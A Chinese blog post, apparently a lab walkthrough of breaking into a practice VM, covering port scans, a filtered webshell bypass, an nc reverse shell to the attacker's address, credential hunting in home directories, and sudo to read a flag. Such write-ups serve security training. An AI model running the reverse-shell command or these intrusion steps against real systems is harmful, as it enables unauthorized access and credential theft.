靶机渗透测试2

最新推荐文章于 2024-05-28 17:28:08 发布
最新推荐文章于 2024-05-28 17:28:08 发布
阅读量138 收藏
点赞数
文章标签: linux php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52191935/article/details/120009962
版权

测试环境:靶机+kali

1.nmap扫描存活主机,发现靶机ip为192.168.152.132

 

2.对目标主机进行全端口扫描

 

3.尝试访问ftp,发现有权限设置

4.尝试访问80端口

查看网站内页面

新闻页面无可用信息

 关于我们页面无可用信息

 通过联系我们页面中的邮箱可以猜测Bob为管理员

 登录页面不存在

5.尝试访问25468端口,发现无法访问

6.对80端口进行目录扫描

 发现robots.txt

7.访问robots.txt,发现数个文件提示

 尝试访问以上文件

login.php页面无法访问

在dev_shell.php页面发现一个webshell,稍后可以加以利用

 lat_memo.html提示该网站有webshell但是有一定的防护

 passwords.html无可用信息

8.尝试利用webshell

whoami查看当前用户

 ls查看当前目录,发现被屏蔽,推测该webshell设置有黑名单

 尝试用/bin/ls绕过屏蔽,发现成功绕过

9.尝试通过echo写入一句话木马,发现有安全监测

10.尝试通过nc连接到shell

开启kali的nc监听

 通过运行/bin/nc -e /bin/bash 192.168.152.130 6666 拿到shell

11.在根目录下发现flag.txt

 尝试打开flag.txt,发现无法查看

 查看权限后发现需要root权限

12.查看家目录,发现数个用户

 通过对网页信息分析,猜测Bob为管理员,故对Bob展开信息收集

13. 发现关键字段password,打开查看,发现用户名jc密码Qwerty

 14.在documents目录下发现可能有用的文件

 发现login.txt.gpg无法打开,staff.txt无可用信息

 再进入secret目录,再进入keep_out目录,发现还有两个目录

 先查看好康的文件夹,发现没什么好康的

 查看不好康的文件夹,发现notes.sh,猜测与密码有些关系

15.调用命令行提示,切换用户为jc

 

16.尝试解压login.txt.gpg,通过猜测与尝试发现密码为notes.sh中的首字母集,得到Bob的密码

 成功登陆Bob用户

 17.通过Bob的管理员权限,通过sudo调用root权限,成功打开flag.txt

 至此成功获取该靶机flag

浅夜轻风
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web安全渗透测试
FogIslandBay的博客
09-20 3651
任务四:Web安全渗透测试 通过浏览器访问http://靶机服务器IP/1,对该页面进行渗透测试, 找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;(2分) 通过浏览器访问http://靶机服务器IP/2,对该页面进行渗透测试, 找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;(2分) 通过浏览器访问http://靶机服务器IP/3,对该页面进行渗透测试, 找到flag格式:flag{Xxxx123},括号中的内容作为flag值并...
靶机渗透测试(CyberSploit: 2)
@小张小张的博客
10-19 993
靶机渗透测试(): ***Vulnhub靶机 *** 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Easy–Intermediate) 目标:拿下三个flag.txt 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 命令:netdiscover -i eth0 -r 192.168.10.0 嗅探出靶机ip为 192.168.10.79 2. nmap进行靶机端口服务扫描 命令: n
靶机简单渗透测试
KKK_2178的博客
11-22 5476
1.下载靶机Metasploitable2-Linux,下载地址:Metasploitable download | SourceForge.net 2.在虚拟机中打开Kali-Linux和下载好的Metasploitable2-Linux,Metasploitable2-Linux的账号:msfadmin,密码:msfadmin. 3.在靶机中输入指令ifconfig,得到靶机ip 4.返回Kali虚拟机操作 输入指令nmap xxxxx (xxxxx为你靶机的ip)查看靶机端口.
综合靶机渗透测试解析
w_j_x_123的博客
05-30 473
7.root家目录下存在一个***.txt文件,文件名+文件内容当作flag提交,用+号连接(例:***.txt+qwoingqwoighoqisfhoasf)7.root家目录下存在一个***.txt文件,文件名+文件内容当作flag提交,用+号连接(例:***.txt+qwoingqwoighoqisfhoasf)6.在kali中搜索该提权漏洞,并将漏洞的披露时间当作flag值提交.(例:2023-05-26);1. 扫描目标靶机靶机开放的所有端口,当作 flag 提交(例:21,22,23)
一次简单靶机渗透测试
qq_38122566的博客
10-07 982
最近一直在准备OSCP的考试,于是就下载了很多的靶机做渗透的练习,目的就是为了更进一步的学习渗透并拿到靶机中的flag。先挑一个简单一点的(路过的大佬们求放过),废话不多说直接上干货。 1.获取靶机ip 直接用nmap开路:root@kali:~# nmap -F 192.168.1.0/24,可以看到靶机的ip为192.168.1.5 2.服务枚举,扫一下tcp端口...
web渗透测试靶机(新手)
05-07
web渗透测试靶机(新手)
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
靶机渗透测试4
qq_52191935的博客
09-01 1139
测试环境:靶机+kali 1.nmap扫描存活主机,得到靶机IP为192.168.152.131 2.对靶机进行全端口扫描,发现80端口(HTTP)及7744端口(SSH)开放 3.根据下载时的提示,要设置hosts文件才能访问到网站 先修改hosts文件,在linux中路径为/etc/hosts,添加如下配置 配置完成后访问80端口,发现访问成功 4.通过网页查看到第一个flag,并得到提示可以使用cewl 5.通过kail的cewl工具生成密码字典,为了便于使用...
网络安全必学渗透测试流程
kali_Ma的博客
02-25 1362
这个靶场是一个对渗透新手很友好的靶场。而且,该靶场包含了渗透测试的信息收集,漏洞利用和权限提升的全过程,对新手理解渗透测试的流程有很好的帮助。 靶场地址:https://hackmyvm.eu/machines/machine.php?vm=Hundred 靶场基本情况: KALI靶机:192.168.1.3/24 主机:192.168.1.146/24 目标:普通用户flag和管理员flag 信息收集阶段: nmap -sn 192.168.1.0/2 sudo nmap -v -T4 -p-
DC-1 靶机渗透测试(拿shell,提权)
single_g_l的博客
03-17 4609
目录 一. 环境 二. 信息收集 1. 主机发现 2.访问 192.168.1.184:80 三. 利用msfconsole 攻击(拿到flag1) 1. 漏洞利用成功 2. 进入会话 ,拿到flag1.txt ---shell ​四. 找到配置文件,获取flag2 五. 修改管理员密码,登录网站,拿到flag3 1. 获取交互式shell, 执行MySQL语句 2. 查看管理员用户 3. 修改管理员密码 六. 用find语句,找到flag4 七. SUID提权,获取...
靶机渗透测试(CyberSploit: 1)
@小张小张的博客
10-12 2276
靶机渗透测试(CyberSploit: 1): Vulnhub靶机 CyberSploit: 1 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机靶机难度:(Easy–Intermediate) 目标:拿下三个flag.txt 渗透流程: 1. 探测靶机ip地址(netdiscover -i eth0 -r 网关) 终端命令: netdiscover -i eth0 -r 192.168.10.0(网关) 得到靶机ip:192.168.10.7
php漏洞靶场,CTF靶场训练-目遍历漏洞
weixin_32557949的博客
03-23 321
Background路径遍历攻击(也称为目录遍历)旨在访问存储在Web根文件夹之外的文件和目录。通过槽中带有“点-斜线(..)” 序列及其变化的文件或使用绝对文件路径来应用文件的变量,可以访问存储在文件系统上的任意文件和目录,包括应用程序源代码、配置或关键系统文件。 这种攻击也称为“点-点斜线”、 “目录遍历”、 “目录爬升” 和 “回溯” 。实验环境攻击机 kali linux : 10.0.2...
linux 之dma_buf (4)- mmap
z20230508的博客
05-28 587
前面几篇都是在 kernel space 对 dma-buf 进行访问的,本篇我们将一起来学习,如何在 user space 访问 dma-buf。当然,user space 访问 dma-buf 也属于 CPU Access 的一种。
linux内部pthread_create函数创建设置栈大小方法
$好记性还是要多记录$
05-22 196
linux 创建线程设置栈大小
Linux:confluence8.5.9的部署(下载+安装+破ji)离线部署全流程
最新发布
鲍海超
05-28 466
Confluence也是比较吃运存了,我建议运行运存给到4g或者4g以上就可以了,核数可以给到1核或以上我部署在centos7.9操作系统上,ip地址为:192.168.6.1,yum仓库使用的是自己的镜像文件,本章所有使用到的包全部为离线包,准备好包,到任何离线环境都可部署,防火墙和selinux都是关闭的。
Linux|如何在 awk 中使用流控制语句
冷冻工厂
05-21 500
对于上面的形式,如果条件 1 为 true,则执行 actions1 并退出 if 语句,否则评估条件 2,如果为 true,则执行 actions2 并退出 if 语句。当您从 Awk 系列一开始回顾我们迄今为止介绍的所有 Awk 示例时,您会注意到各个示例中的所有命令都是按顺序执行的,即一个接一个。这里,该方法简单地定义为使用计数器来控制循环执行,首先需要初始化计数器,然后根据测试条件运行它,如果为真,则执行操作,最后递增计数器。条件是一个 Awk 表达式,操作是条件为真时执行的 Awk 命令行。
metasploit靶机渗透测试
08-02
Metasploit靶机是一个用于渗透测试和漏洞利用的虚拟机。您可以通过在VMware虚拟机中安装Metasploitable来搭建一个用于练习渗透攻击的环境。首先,您需要下载Metasploitable虚拟机镜像文件,可以在SourceForge网站上找到下载链接[1]。然后,您需要在VMware Workstation中创建一个新的虚拟机,并将下载的Metasploitable镜像文件导入到虚拟机中。接下来,您可以启动Metasploitable虚拟机,并使用Kali Linux等工具进行渗透测试和漏洞利用的练习[2]。 请注意,渗透测试和漏洞利用是一项合法的活动,但在进行任何形式的渗透测试之前,您必须获得合法的授权,并且只能在授权范围内进行操作。此外,渗透测试应该仅限于您拥有合法权限的系统和网络。在进行任何渗透测试之前,请确保您已经了解并遵守相关的法律和道德准则[3]。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值